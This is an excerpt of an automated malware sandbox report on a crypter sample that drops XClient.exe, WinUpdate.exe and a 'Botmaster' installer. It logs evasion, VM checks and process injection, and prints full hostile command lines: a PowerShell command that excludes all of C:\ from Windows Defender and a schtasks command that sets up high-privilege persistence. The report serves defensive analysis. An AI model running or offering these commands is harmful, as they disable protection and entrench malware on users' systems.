                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeThread delayed: delay time: 922337203685477
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5204Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 5080Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 4441Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5755
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 376
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeWindow / User API: threadDelayed 6890
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeWindow / User API: threadDelayed 1866
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\Newtonsoft.Json.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\System.Memory.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\System.Buffers.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.Shell.Interop.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.TextManager.Interop.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.WinForms.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.Core.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\System.Threading.Tasks.Extensions.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\System.Text.Json.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\Uninstall.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\runtimes\win-x64\native\WebView2Loader.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\runtimes\win-arm64\native\WebView2Loader.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\runtimes\win-x86\native\WebView2Loader.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\System.Text.Encodings.Web.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.OLE.Interop.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.Wpf.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\System.Numerics.Vectors.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeDropped PE file which has not been started: C:\Program Files (x86)\Bot Master\Bot Master\System.ValueTuple.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeEvaded block: after key decisiongraph_8-25784
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe TID: 7496Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep count: 5204 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep count: 3546 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7556Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 7512Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\WinUpdate.exe TID: 7284Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\WinUpdate.exe TID: 7776Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep count: 5755 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5660Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2212Thread sleep count: 376 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5824Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe TID: 5228Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe TID: 5796Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe TID: 5796Thread sleep time: -30000s >= -30000s
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe TID: 5228Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 7152Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 2800Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\WinUpdate.exe TID: 5076Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 4484Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 4076Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 2212Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 7940Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\js FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Code Cache\wasm FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\ScriptCache FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\CacheStorage\0bf6ab7f94a21cdc9c1649f884333ec20f40a544\2c729997-e290-497a-ab91-2215fe9755ea FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\blob_storage\6715cf76-f652-4408-b045-6e7a66034152 FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47 FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47 FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Users\user FullSizeInformation
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeFile Volume queried: C:\Users\user FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_0041C085 wcsncpy,wcslen,wcscat,GetDriveTypeW,FindFirstFileW,FindClose,GetFileAttributesW,GetDriveTypeW,8_2_0041C085
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_0041C1F3 wcsncpy,wcslen,wcscat,wcscpy,FindFirstFileW,wcscmp,wcscpy,wcscat,FindFirstFileW,wcscpy,wcscat,wcscmp,wcscmp,FindNextFileW,FindClose,wcscpy,wcscat,FindFirstFileW,SetFileAttributesW,wcscpy,wcscat,wcscmp,wcscmp,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,8_2_0041C1F3
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00408B02 GetSystemInfo,8_2_00408B02
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeThread delayed: delay time: 922337203685477
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeThread delayed: delay time: 922337203685477
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: msedgewebview2.exe, 0000001D.00000002.3690243283.00002DDC0006C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                  Source: WinUpdate.exe, 00000022.00000002.2346424155.0000000002CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                  Source: msedgewebview2.exe, 0000001D.00000002.3702150914.00002DDC0096C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mousetion":"1"}}}
                  Source: svchost.exe, 0000001B.00000002.3648007721.000002A2C3E58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.3632281311.000002A2BE82B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: msedgewebview2.exe, 0000001D.00000002.3691208452.00002DDC000F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/873489b1-33b2-480a-baa2-641b9e09edcd?P1=1710273875&P2=404&P3=2&P4=VVUivSGrCnDVQCXSZLEvFSi6JnoDKzDYHMJRo4CqtbELi7dsnhK05ziuxOoOOdEL83j%2fu9vcp%2fWsFeWRXSjMGQ%3d%3dUSB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=9846a526-41ae-442b-8b72-32687670976b
                  Source: WinUpdate.exe, 00000022.00000002.2346424155.0000000002CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                  Source: aspnet_compiler.exe, 00000009.00000002.3612006646.0000000000D74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrk
                  Source: BotMaster.exe, 0000001A.00000002.3745929881.0000000008090000.00000004.00000020.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3652289246.0000021F2D640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: msedgewebview2.exe, 0000001D.00000002.3691208452.00002DDC000F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=9846a526-41ae-442b-8b72-32687670976b
                  Source: msedgewebview2.exe, 00000020.00000002.3626375041.00000193E582B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllto4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00421743 memset,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateWindowExW,HeapAlloc,SetPropW,SendMessageW,SetWindowLongW,SetWindowPos,RedrawWindow,8_2_00421743
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds extensions / path to Windows Defender exclusion list
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -exclusionpath C:\
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -exclusionpath C:\
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -exclusionpath C:\Jump to behavior
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -exclusionpath C:\
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 42A000Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 42C000Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: B75008Jump to behavior
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 42A000
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 42C000
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: DC3008
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess created: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe "C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -exclusionpath C:\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\WinUpdate.exe "C:\Users\user\AppData\Local\WinUpdate.exe"
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe "C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe"
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -exclusionpath C:\
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=117.0.5938.132 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=117.0.2045.47 --initial-client-data=0x15c,0x160,0x164,0x138,0x170,0x7ffdfb488e88,0x7ffdfb488e98,0x7ffdfb488ea8
